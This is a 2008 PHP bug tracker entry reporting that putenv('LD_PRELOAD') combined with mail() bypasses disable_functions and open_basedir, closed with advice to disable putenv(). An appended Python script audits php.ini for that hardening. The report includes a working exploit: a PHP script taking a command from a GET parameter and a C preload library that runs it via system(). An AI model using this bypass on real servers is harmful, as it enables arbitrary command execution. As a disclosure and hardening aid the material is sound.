ID: 46741
Updated by: [EMAIL PROTECTED]
Reported By: gat3way at gat3way dot eu
-Status: Open
+Status: Bogus
Bug Type: Safe Mode/open_basedir
Operating System: Linux
PHP Version: 5.2.6
New Comment:
You should disable putenv() as well.
Previous Comments:
------------------------------------------------------------------------
[2008-12-03 16:43:19] gat3way at gat3way dot eu
Description:
------------
safe_mode is safe, but the mail() function should check environment
variables IMO.
e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail()
calls /usr/bin/mail, if your library exports a function like getuid() you
can bypass open_basedir restrictions and restrictions on program
execution, etc.
If you need some more info, please contact me at:
[EMAIL PROTECTED]
Milen Rangelov
Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a = fopen("/var/www/.comm", "w");
fputs($a, $_GET["c"]);
fclose($a);
mail("a", "a", "a", "a");
$a = fopen("/var/www/.comm1", "r");
while (!feof($a)) {
    $b = fgets($a);
    echo $b;
}
fclose($a);
?>
A simple library:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* write(), and the prototype getuid() must match */

/* Preloaded into the mailer spawned by mail(); overrides getuid(). */
uid_t getuid(void)
{
    char *buf = malloc(300);
    FILE *a;
    unsetenv("LD_PRELOAD");
    /* read the command the PHP script wrote to .comm */
    a = fopen("/var/www/.comm", "r");
    buf = fgets(buf, 100, a);
    write(2, buf, strlen(buf));
    fclose(a);
    remove("/var/www/.comm");
    rename("/var/www/a.so", "/var/www/b.so");
    /* run it and leave the output in .comm1 for the script to read back */
    buf = strcat(buf, " > /var/www/.comm1");
    system(buf);
    rename("/var/www/b.so", "/var/www/a.so");
    free(buf);
    return 0;
}
Expected result:
----------------
execute arbitrary commands even though we have:
disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www
Actual result:
--------------
The test was successful.
------------------------------------------------------------------------
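The maintainer's answer to this report is a configuration fix: the disable_functions list in the reproduce section (dl,system,exec,passthru,shell_exec,popen) is not enough on its own, and putenv() has to be disabled too. The following is an added example (not code from the bug report or from PHP) of a small audit that parses php.ini text and reports which of those functions are still enabled; the two php.ini fragments it checks are constructed for the example, with WEAK_INI mirroring the settings quoted in the report and HARDENED_INI adding putenv.

```python
import re

# The hardening this thread converges on: the reporter's disable_functions
# list plus putenv, which the maintainer's reply says must be disabled as well.
REQUIRED_DISABLED = ("dl", "system", "exec", "passthru", "shell_exec", "popen", "putenv")

# Constructed sample configs (not from the report).  WEAK_INI reproduces the
# settings quoted in the report; HARDENED_INI adds putenv.
WEAK_INI = """
[PHP]
; example vhost config
open_basedir = /var/www
disable_functions = dl,system,exec,passthru,shell_exec,popen
"""

HARDENED_INI = """
[PHP]
open_basedir = "/var/www"
disable_functions = "dl, system, exec, passthru, shell_exec, popen, PutEnv"  ; added putenv
"""


def parse_directive(ini_text, name):
    """Return the value of the last uncommented `name = value` line, or None.

    Handles php.ini comments (';'), section headers, surrounding quotes and
    trailing comments; a later line wins, as it does in php.ini itself.
    """
    value = None
    for line in ini_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in ";#[":
            continue
        key, sep, raw = stripped.partition("=")
        if not sep or key.strip().lower() != name.lower():
            continue
        raw = raw.split(";", 1)[0].strip()      # drop trailing comment
        value = raw.strip("\"'")
    return value


def disabled_functions(ini_text):
    """Set of function names listed in disable_functions, normalised to lowercase."""
    value = parse_directive(ini_text, "disable_functions")
    if not value:
        return set()
    return {f.strip().lower() for f in re.split(r"[,\s]+", value) if f.strip()}


def missing_disabled_functions(ini_text, required=REQUIRED_DISABLED):
    """Required functions that the config leaves enabled, sorted for stable output."""
    return sorted(set(required) - disabled_functions(ini_text))


def audit(ini_text):
    """One-shot summary a reviewer can act on."""
    return {
        "open_basedir": parse_directive(ini_text, "open_basedir"),
        "missing": missing_disabled_functions(ini_text),
    }


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit(ini))
```

Running the script reports `putenv` as missing for the weak config and nothing for the hardened one. The check reads the file as text, so it tells you what a given php.ini asks for; whether the running interpreter actually got it (another ini file loaded later, a per-host override) is a separate question answered by `php -i` or ini_get() on the host.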
--
Edit this bug report at http://bugs.php.net/?id=46741&edit=1